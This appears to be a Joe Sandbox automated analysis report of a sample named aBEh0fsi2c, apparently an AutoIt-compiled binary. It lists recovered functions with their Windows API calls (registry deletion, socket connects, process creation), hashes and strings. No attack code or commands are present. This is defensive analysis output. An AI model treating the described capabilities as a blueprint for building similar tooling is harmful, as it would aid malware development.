Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
Instruction ID: d134dbc700807f5d3bdf510242196e75022bb8251088be1683fdc1e40487003b
Opcode Fuzzy Hash: 1708645f9d319fc0058ac6a8720c130c4c13acb6a88027e6b17d6b661215ea4e
Instruction Fuzzy Hash: 6F415C75600259EFDB21DF51D884A9ABBF8FB05310F15862AFD059B290C770AD10DFA0

Function 003E0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 003E0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E0FFE
FreeLibrary.KERNEL32(00000000), ref: 003E10B5

Part of subcall function 003E0FA5: RegCloseKey.ADVAPI32(?), ref: 003E101B
Part of subcall function 003E0FA5: FreeLibrary.KERNEL32(?), ref: 003E106D
Part of subcall function 003E0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003E1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 003E1058

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
Instruction ID: 995aba2f21bc17eed292690256eafb0f9246057cb9ce048bb385cf836106850d
Opcode Fuzzy Hash: f1ddcd235facbfd77223200115a043afe8df0570439768c30cc32524889a860d
Instruction Fuzzy Hash: 7E310F71901159BFDB26DF91DC89EFFB7BCEF08310F000269E511A6191D6745E899AA0

Function 003E62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003E62EC
GetWindowLongW.USER32(00E0CFA0,000000F0), ref: 003E631F
GetWindowLongW.USER32(00E0CFA0,000000F0), ref: 003E6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003E6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003E63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 003E63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003E63DB

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
Instruction ID: 0c9217ecdbe77db21f7627641f2e82dbea3c6ba734e2836b74a5558f54a73120
Opcode Fuzzy Hash: 4bfc60c14d37d84ee49da08a838fbbc885e7fbeb662669eff4cf7422026698ff
Instruction Fuzzy Hash: A93116346402A09FDB22DF1ADC85F5837E5FB5A754F190264F510DF2F2CBB1A8408B51

Function 003BDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDB54
SysAllocString.OLEAUT32(00000000), ref: 003BDB57
SysAllocString.OLEAUT32(?), ref: 003BDB75
SysFreeString.OLEAUT32(?), ref: 003BDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 003BDBA3
SysAllocString.OLEAUT32(?), ref: 003BDBB1

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: fe7c41beb71f807fef0553fb224bfcd8e51899160742e39f9df2f0778a5675f7
Instruction ID: 6b9cb70e32e6d7c40ad34ce380f735ce4a0410559008c3cff9657f3f90cbd9d3
Opcode Fuzzy Hash: fe7c41beb71f807fef0553fb224bfcd8e51899160742e39f9df2f0778a5675f7
Instruction Fuzzy Hash: 08219236600219AFDF11EFA9DC88CFB73ACEB09364B018565FA14DB6A0E6709D458B60

Function 003D6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 003D7D8B: inet_addr.WSOCK32(00000000), ref: 003D7DB6

socket.WSOCK32(00000002,00000001,00000006), ref: 003D61C6
WSAGetLastError.WSOCK32(00000000), ref: 003D61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D620E
connect.WSOCK32(00000000,?,00000010), ref: 003D6217
WSAGetLastError.WSOCK32 ref: 003D6221
closesocket.WSOCK32(00000000), ref: 003D624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 003D6263

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
Instruction ID: 0874b6e8859931b423ed68a422c59770b2f15c469cdbe1156fd8f5a51fe15692
Opcode Fuzzy Hash: 291a803e8fefe33624876894dd8f06615f91688f1726d48f3fc336ee1edcce62
Instruction Fuzzy Hash: C531D572600104AFEF11AF24DC86BBD77ADEF45750F04842AFD159B291DB70AC048BA1

Function 003BF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 003BF671
__wcsnicmp.LIBCMT ref: 003BF692
__wcsnicmp.LIBCMT ref: 003BF6AC

Strings

#requireadmin, xrefs: 003BF68C
#notrayicon, xrefs: 003BF669
#OnAutoItStartRegister, xrefs: 003BF6A6

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: fe67fe636a66fbf1b4a44baaefcc8d2f6cfa4dd8ef5d02a0febd9dc94a8d04a9
Instruction ID: 5f114c2510c0ced898e4a8f4365868f10f98ed100b7d9e29dc4393698db56a20
Opcode Fuzzy Hash: fe67fe636a66fbf1b4a44baaefcc8d2f6cfa4dd8ef5d02a0febd9dc94a8d04a9
Instruction Fuzzy Hash: F9212572205611AFD223B634AC03FF77398EF55788B11507AFA458A951EB909E42C395

Function 003BDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003BDC2F
SysAllocString.OLEAUT32(00000000), ref: 003BDC32
SysAllocString.OLEAUT32 ref: 003BDC53
SysFreeString.OLEAUT32 ref: 003BDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 003BDC76
SysAllocString.OLEAUT32(?), ref: 003BDC84

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 478bd36d3d8727fe683755f52e92f728b8005f74a7c1553e2ca7c50f6eb995f2
Instruction ID: aca72efe8967c5b629f467a6315d59e8c68a0450ad798c92abb19f6a3768d297
Opcode Fuzzy Hash: 478bd36d3d8727fe683755f52e92f728b8005f74a7c1553e2ca7c50f6eb995f2
Instruction Fuzzy Hash: AD217435604205AF9B15EFA9DC88DFB77ECEB08364B118125FA14CB6E1E6B0DC41CB64

Function 003E75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00361D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00361D73
Part of subcall function 00361D35: GetStockObject.GDI32(00000011), ref: 00361D87
Part of subcall function 00361D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00361D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 003E7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 003E763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 003E764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 003E7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 003E7665

Strings

Msctls_Progress32, xrefs: 003E7603

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
Instruction ID: 1ca63347fcfabba9b06d61ef5b3d98a5499b4664e2356cc2877e29b6133696d9
Opcode Fuzzy Hash: 261774995b98c691d46fcd24c0d42778d7ab97fdcb7080a9aaf8511822c944a4
Instruction Fuzzy Hash: AB11B6B1150129BFEF118F65CC85EE77F5DEF08798F114215F604A6090C7729C21DBA4

Function 00389AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00389AE6

Part of subcall function 00383187: EncodePointer.KERNEL32(00000000), ref: 0038318A
Part of subcall function 00383187: __initp_misc_winsig.LIBCMT ref: 003831A5
Part of subcall function 00383187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00389EA0
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00389EB4
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00389EC7
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00389EDA
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00389EED
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00389F00
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00389F13
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00389F26
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00389F39
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00389F4C
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00389F5F
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00389F72
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00389F85
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00389F98
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00389FAB
Part of subcall function 00383187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00389FBE

__mtinitlocks.LIBCMT ref: 00389AEB
__mtterm.LIBCMT ref: 00389AF4

Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C56
Part of subcall function 00389B5C: _free.LIBCMT ref: 00389C5D
Part of subcall function 00389B5C: DeleteCriticalSection.KERNEL32(02B,?,?,00389AF9,00387CD0,0041A0B8,00000014), ref: 00389C7F

__calloc_crt.LIBCMT ref: 00389B19
__initptd.LIBCMT ref: 00389B3B
GetCurrentThreadId.KERNEL32 ref: 00389B42

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 18f4fc06bbf2b531de8ac95654cb491a282d86c2f1e4bf22fffad3160fce6c1d
Instruction ID: 4c995edd790c22a5aab8edfa7e60d6572c0e06003f26e42c97bf292fbed6e2c8
Opcode Fuzzy Hash: 18f4fc06bbf2b531de8ac95654cb491a282d86c2f1e4bf22fffad3160fce6c1d
Instruction Fuzzy Hash: B7F0F0322193115AE63B7775BC037AA2690DF02730F294AEBF820DE0D2FF20880143A4

Function 003EB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003EB644
_memset.LIBCMT ref: 003EB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00426F20,00426F64), ref: 003EB682
CloseHandle.KERNEL32 ref: 003EB694

Strings

oB, xrefs: 003EB63E
doB, xrefs: 003EB64D

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oB$doB
API String ID: 3277943733-2474204165
Opcode ID: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
Instruction ID: 8e90c14475dd40336a24aafa8c9cecf98d4e6b6988429cb10abf83470bbb5710
Opcode Fuzzy Hash: 244b7d89f2c904f521b3a5dabafcbc18a98352f5f573d4fa25c99a4ad2907fb4
Instruction Fuzzy Hash: FBF05EB6640350BEEA222761BD46FBB7A9CEB08395F424031BA08E9196D7754C0187AC

Function 0038406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00383F85), ref: 00384085
GetProcAddress.KERNEL32(00000000), ref: 0038408C
EncodePointer.KERNEL32(00000000), ref: 00384097
DecodePointer.KERNEL32(00383F85), ref: 003840B2

Strings

RoUninitialize, xrefs: 00384074
combase.dll, xrefs: 00384080

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
Instruction ID: e44d5e30d74244cf066a6f0790b4978c2b37953b306b7a34a8413ee089e193c6
Opcode Fuzzy Hash: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
Instruction Fuzzy Hash: D0E012B4681304EFEA32AF60EC49B623AB8B704743F504238F611E90E0CFBA4211CB08

Function 003C64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003C660B
_memmove.LIBCMT ref: 003C6546

Part of subcall function 00369837: __itow.LIBCMT ref: 00369862
Part of subcall function 00369837: __swprintf.LIBCMT ref: 003698AC

_memmove.LIBCMT ref: 003C65B9
_memmove.LIBCMT ref: 003C66A0
_memmove.LIBCMT ref: 003C66B9
_memmove.LIBCMT ref: 003C66D5

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 3f374972b687e86cf07dd6252ac37afda97c21d99c549dcfd7a09bd50f8996f7
Instruction ID: b0f60ba9f542841947e6e5bd083712e90b64b5818952ae5d395d147d10a55f3c
Opcode Fuzzy Hash: 3f374972b687e86cf07dd6252ac37afda97c21d99c549dcfd7a09bd50f8996f7
Instruction Fuzzy Hash: DD617A30500A5A9BCF07EF64CC82FFE37A9AF09308F448559F9599B296DB34AD15CB50

Function 003E01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22

Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003E0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003E0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 003E038C
RegCloseKey.ADVAPI32(00000000), ref: 003E0399

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: bf89ad03a23cfd144dac9dd02f058d53892ab49e41871162a964abe10d652bb7
Instruction ID: f43f1b7c2a427046508181bb61a77da8260fedc16622e610fc9158961c8ceb92
Opcode Fuzzy Hash: bf89ad03a23cfd144dac9dd02f058d53892ab49e41871162a964abe10d652bb7
Instruction Fuzzy Hash: 68516A311082409FC716EF64C885E6FBBE8FF84314F448A2DF5858B2A2DB71E945CB52

Function 003E5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 003E57FB
GetMenuItemCount.USER32(00000000), ref: 003E5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003E585A
GetMenuItemID.USER32(?,?), ref: 003E58C9
GetSubMenu.USER32(?,?), ref: 003E58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 003E5928

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 0a12202839ea84071348fade4a0fa7ef57b47fc8b69340be3b6bb002fea12161
Instruction ID: 376637d308939df76eff2d45445ad3ec6e736ae1a0584d38fe2fc9918a531308
Opcode Fuzzy Hash: 0a12202839ea84071348fade4a0fa7ef57b47fc8b69340be3b6bb002fea12161
Instruction Fuzzy Hash: CB516035E00665EFCF16EF65C885AAEB7B8EF48314F114169E815BB391CB70AE41CB90

Function 003BEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003BEF06
VariantClear.OLEAUT32(00000013), ref: 003BEF78
VariantClear.OLEAUT32(00000000), ref: 003BEFD3
_memmove.LIBCMT ref: 003BEFFD
VariantClear.OLEAUT32(?), ref: 003BF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003BF078

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
Instruction ID: fe1457a67525b357c3e8dd48b46b6a4490dfdc1e769b777f534c4291820ceb33
Opcode Fuzzy Hash: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
Instruction Fuzzy Hash: 4C5169B5A00209EFCB15DF58C880AAAB7B8FF4C314F158569EA59DB351E734E911CFA0

Function 003C220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003C2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C22A3
IsMenu.USER32(00000000), ref: 003C22C3
CreatePopupMenu.USER32 ref: 003C22F7
GetMenuItemCount.USER32(000000FF), ref: 003C2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003C2386

Memory Dump Source

Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

